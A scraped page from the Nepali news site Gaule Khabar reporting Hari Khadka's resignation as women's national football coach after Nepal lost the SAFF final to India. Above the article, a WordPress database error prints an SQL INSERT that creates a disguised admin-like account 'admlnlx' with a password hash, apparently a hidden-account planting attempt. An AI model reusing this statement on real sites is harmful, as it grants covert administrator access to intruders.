WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BOe9fhx8R0kSW/izYj87ZRnpaXGiIz.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 08:26:18', '', 'admlnlx', 'admlnlx')

महिला फुटबल प्रशिक्षकबाट हरि खड्काको राजीनामा – Gaule Khabar

महिला फुटबल प्रशिक्षकबाट हरि खड्काको राजीनामा

महिला फुटबल प्रशिक्षकबाट हरि खड्काको राजीनामा

गाउँले न्युज, काठमाडौं । नेपाली राष्ट्रिय महिला फुटबल टिमका प्रशिक्षक हरि खड्काले पदबाट राजीनामा दिएका छन् ।
साग महिला फुटबलको फाइनलमा नेपाल भारतसँग २–० ले पराजित भएसँगै खड्काले राजीनामाको घोषणा गरेका हुन् ।
पोखरामा भएको फाइनलमा फेरि भारतसँग हारेपछि नेपालले रजतमा चित्त बुझाउनु परेको छ ।

sourse:onlinekhabar

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका